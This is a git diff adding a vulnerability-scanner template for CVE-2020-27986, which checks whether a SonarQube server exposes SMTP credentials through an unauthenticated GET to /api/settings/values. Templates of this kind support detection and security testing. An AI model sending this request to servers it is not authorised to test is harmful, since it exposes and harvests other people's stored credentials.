diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml new file mode 100644 index 0000000000..6881296299 --- /dev/null +++ b/cves/2020/CVE-2020-27986.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-27986 + +info: + name: SonarQube unauth + author: pikpikcu + severity: medium + description: | + SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, + SVN, and GitLab credentials via the api/settings/values URI. + NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." + + # Refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/settings/values" + + matchers-condition: and + matchers: + - type: word + words: + - email.smtp_host.secured + - email.smtp_password.secured + - email.smtp_port.secured + - email.smtp_username.secured + part: body + condtion: and + - type: status + status: + - 200